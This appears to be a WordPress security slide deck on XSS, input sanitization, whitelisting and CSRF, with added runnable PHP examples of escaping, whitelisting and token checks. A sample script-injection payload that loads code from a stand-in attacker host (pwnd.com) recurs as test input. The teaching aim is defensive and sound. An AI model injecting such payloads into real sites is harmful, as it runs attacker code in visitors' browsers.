5. tl;dr
• Keep your dev environment clean
• Escape your data output
• Sanitize your data inputs
• Validate referrers
• Core functionality should always trump your super awesome functionality
6. Keep Your Dev Environment Clean
Don’t think that just because you’re on a Mac you’re safe from viruses.
If you’re on a PC, you should assume you’re already pwned.
9. XSS: Cross-site Scripting
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007.[1] Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.
http://en.wikipedia.org/wiki/Cross-site_scripting
10. Escape All The Things On Output
http://codex.wordpress.org/Data_Validation#Output_Sanitation
• Bad data will be tamed
• esc_{context}
• esc_js - Escape single quotes, htmlspecialchar " < > &, and fix line endings.
• esc_html - Escaping for HTML blocks.
• esc_attr - Escaping for HTML attributes.
• esc_sql - Escapes data for use in a MySQL query.
• esc_url - Checks and cleans a URL.
• esc_textarea - Escaping for textarea values.
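The point of esc_{context} is that one untrusted string needs a different transformation for each place it lands in the page. The following is an added example, not code from the original slides or from WordPress: it takes one attacker-shaped value and renders it into an HTML text node, an attribute, a JavaScript string and an href using plain-PHP stand-ins (out_html, out_attr, out_js, out_url are names assumed here), with a comment on each noting the WordPress function it approximates, so the script runs with `php` alone.

```php
<?php
// Added example (not from the original slides or WordPress core): the same
// untrusted string escaped for four output contexts with plain-PHP stand-ins.
// In WordPress you would call esc_html(), esc_attr(), esc_js() and esc_url().

// Constructed attacker-controlled value, e.g. a post meta field read back out.
$untrusted = '"><script src="http://pwnd.com/u.js"></script>';

// esc_html stand-in: inside an HTML text node, < > & " ' become entities.
function out_html(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// esc_attr stand-in: same entity encoding, but the caller must ALSO wrap the
// value in quotes; an unquoted attribute ends at the first space.
function out_attr(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// esc_js stand-in for a JS string context. Unlike esc_js(), which escapes a
// value for use inside an existing single-quoted JS string, json_encode()
// emits a complete quoted literal; JSON_HEX_TAG turns < and > into \u003C
// and \u003E so the value can never close the surrounding <script> element.
function out_js(string $s): string {
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// esc_url stand-in: allow only http(s) schemes, then entity-encode for href.
// Returns null for anything else (javascript:, data:, scheme-less junk).
function out_url(string $s): ?string {
    $scheme = strtolower((string) parse_url($s, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;
    }
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

echo '<p>', out_html($untrusted), "</p>\n";
echo '<input value="', out_attr($untrusted), "\">\n";
echo '<script>var e = ', out_js($untrusted), ";</script>\n";
echo '<a href="', out_url($untrusted) ?? '#', "\">link</a>\n";
echo '<a href="', out_url('javascript:alert(1)') ?? '#', "\">link</a>\n";
echo '<a href="', out_url('http://example.com/?q=a&b=c') ?? '#', "\">link</a>\n";
```

Note that out_html and out_attr are identical here: in HTML the difference between the two contexts is not the encoding but the requirement that the attribute value be quoted, which is why esc_attr output must always sit inside `"..."`. The URL case is the one where escaping alone is not enough; a dangerous scheme has to be rejected, not encoded, which is what esc_url's "checks and cleans" wording refers to.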
11. Sanitize All The Things On Input
http://codex.wordpress.org/Data_Validation#Input_Validation
• sanitize_* and similar functions help for most things
• $_POST = array('e' => '<script src="http://pwnd.com/u.js"></script>');
• BAD: update_post_meta($id, 'e', $_POST['e']);
• GOOD: update_post_meta($id, 'e', sanitize_email($_POST['e']));
• Note: Might unintentionally change data and give unexpected results
12. Whitelisting Data
http://codex.wordpress.org/Data_Validation#Whitelist
• Whitelisting data - Only accept known data
• $_POST = array(
    'pwn' => '<script src="http://pwnd.com/u.js"></script>',
    'e'   => 'email@domain.com'
  );
• BAD:
  foreach ($_POST as $key => $val) :
      update_post_meta($id, $key, $val);
  endforeach;
• GOOD: update_post_meta($id, 'e', sanitize_email($_POST['e']));
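Slides 11 and 12 make one combined point: iterate over the keys you expect, not over $_POST, and run each accepted key through a sanitizer chosen for that key. The following is an added example, not code from the original slides or from WordPress. It uses plain-PHP stand-ins (my_sanitize_email, my_sanitize_text, my_update_post_meta are assumed names) for sanitize_email(), sanitize_text_field() and update_post_meta() so that it runs without WordPress, and it also illustrates the "might unintentionally change data" caveat: a sanitizer strips characters rather than rejecting the input.

```php
<?php
// Added example (not from the original slides or WordPress core): a whitelist
// of allowed meta keys, each paired with its own sanitizer, applied to a
// constructed $_POST. Plain-PHP stand-ins replace the WordPress functions.

// Constructed request: two keys we expect ('e', 'bio'), one we do not ('pwn').
$_POST = [
    'pwn' => '<script src="http://pwnd.com/u.js"></script>',
    'e'   => 'email@domain.com',
    'bio' => 'Hi <b>there</b>',
];

// Stand-in for sanitize_email(): strip anything outside the characters
// allowed in an address, then validate what is left. Like the real function,
// this silently CHANGES input instead of rejecting it (the slide's caveat).
function my_sanitize_email(string $raw): string {
    $stripped = preg_replace('/[^A-Za-z0-9.!#$%&\'*+\/=?^_`{|}~@-]/', '', $raw);
    return filter_var($stripped, FILTER_VALIDATE_EMAIL) === false ? '' : $stripped;
}

// Stand-in for sanitize_text_field(): drop tags and control characters.
function my_sanitize_text(string $raw): string {
    $s = strip_tags($raw);
    return trim(preg_replace('/[\x00-\x1F\x7F]+/', ' ', $s));
}

// Stand-in for update_post_meta(): record what would have been stored.
$stored = [];
function my_update_post_meta(int $id, string $key, string $val): void {
    global $stored;
    $stored[$id][$key] = $val;
}

// The whitelist: only these keys are accepted, and each names its sanitizer.
$allowed = [
    'e'   => 'my_sanitize_email',
    'bio' => 'my_sanitize_text',
];

$post_id = 42;
foreach ($allowed as $key => $sanitizer) {
    if (!array_key_exists($key, $_POST) || !is_string($_POST[$key])) {
        continue; // missing or wrong type: skip, never store raw input
    }
    my_update_post_meta($post_id, $key, $sanitizer($_POST[$key]));
}
// 'pwn' is never even read, because the loop walks $allowed, not $_POST.

var_dump($stored);

// The caveat in action: a space in the address is removed rather than the
// value being refused, so the stored address is not what the user typed.
var_dump(my_sanitize_email('user@exam ple.com'));
```

Walking the whitelist instead of the request array is what makes the BAD loop safe: an unexpected key like 'pwn' can neither be stored under its own name nor overwrite a key the plugin relies on. Where silent alteration is unacceptable (an email that will be used for password resets, say), compare the sanitized value with the raw one and treat a mismatch as a validation error rather than storing the changed value.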
14. CSRF: Cross-site Request Forgery
Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf[1]) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.[2] Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.
http://en.wikipedia.org/wiki/Cross-site_request_forgery
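The defense the tl;dr summarizes as "validate referrers" is to refuse a state-changing request unless it carries something the browser alone cannot supply on the attacker's behalf. The following is an added example, not code from the original slides or from WordPress: a minimal plain-PHP check that binds a random token to the session and requires it back in the POST body, and additionally compares the Origin (or Referer) host against the site's own host (SITE_HOST, csrf_token, csrf_check and request_source_host are assumed names). WordPress ships the token half of this as wp_nonce_field() with check_admin_referer() / wp_verify_nonce(); those are not called here so the script runs stand-alone.

```php
<?php
// Added example (not from the original slides or WordPress core): a minimal
// CSRF check for a state-changing form, exercised with constructed requests
// standing in for $_SESSION, $_POST and the request headers.

const SITE_HOST = 'example.com'; // assumed host of our own site

// Issue one random token per session; store it server-side, embed it in forms.
function csrf_token(array &$session): string {
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// Host of the Origin header if present, else of Referer, else null.
function request_source_host(array $headers): ?string {
    foreach (['Origin', 'Referer'] as $h) {
        if (!empty($headers[$h])) {
            $host = parse_url($headers[$h], PHP_URL_HOST);
            return is_string($host) ? strtolower($host) : null;
        }
    }
    return null;
}

// True only for a request that echoes the session's token AND whose source
// host is our own. hash_equals() compares in constant time.
function csrf_check(array $session, array $post, array $headers): bool {
    $expected = $session['csrf'] ?? '';
    $given    = $post['_token'] ?? '';
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        return false;
    }
    return request_source_host($headers) === SITE_HOST;
}

// --- Constructed requests ---
$session = [];
$token   = csrf_token($session);

// Legitimate submission from our own form: token present, Origin is ours.
$good = csrf_check(
    $session,
    ['action' => 'delete', '_token' => $token],
    ['Origin' => 'https://example.com']
);

// Forged submission: the victim's browser attaches the session cookie, but
// the cross-site page cannot read the token and its Origin is not ours.
$forged = csrf_check(
    $session,
    ['action' => 'delete'],
    ['Origin' => 'http://pwnd.com']
);

// Token present but source host wrong: still refused.
$wrong_host = csrf_check(
    $session,
    ['action' => 'delete', '_token' => $token],
    ['Referer' => 'http://pwnd.com/page']
);

var_dump($good, $forged, $wrong_host);
```

The token is the load-bearing check; the Origin/Referer comparison is a second layer, since some clients and proxies strip Referer, and a missing header here fails closed (request_source_host returns null, which never equals SITE_HOST). The token must be tied to the session and compared with hash_equals(), and the form must be submitted with POST, because a token in a GET URL leaks through Referer and browser history.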